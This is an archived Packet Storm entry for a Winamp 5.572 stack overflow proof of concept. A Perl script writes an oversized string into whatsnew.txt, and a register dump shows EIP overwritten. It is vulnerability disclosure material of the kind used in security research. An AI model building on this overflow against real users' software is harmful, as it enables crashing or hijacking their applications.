Winamp 5.572 Stack Overflow Proof Of Concept

2010-01-26T00:00:00
ID PACKETSTORM:85617
Type packetstorm
Reporter Debug
Modified 2010-01-26T00:00:00

Description

                                        
                                            `# Exploit Title: Winamp 5.572 whatsnew.txt Stack Overflow PoC  
# Date: 24.01.10  
# Author: Debug (eldadru@gmail.com)  
# Software Link: http://download.nullsoft.com/winamp/client/winamp5572_full_emusic-7plus_en-us.exe  
# Version: 5.572  
# Tested on: Windows xp(sp2)  
  
  
#!/usr/bin/perl  
  
  
# Replace whatsnew.txt , open Winamp click Help->about winamp-> version history.  
# hacking.org.il.  
  
#EAX 00000000  
#ECX 00000000  
#EDX 00661658  
#EBX 00000000  
#ESP 00B7EDE8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
#EBP 00B7EDFC ASCII "AAAAAAAAAAAAAAAAAAA"  
#ESI 00401280 winamp.00401280  
#EDI 00000000  
#EIP 41414141  
  
my $overflow="Winamp 5.572"."A"x600;  
  
open(myfile,'>>whatsnew.txt');  
  
print myfile $overflow;  
  
  
  
`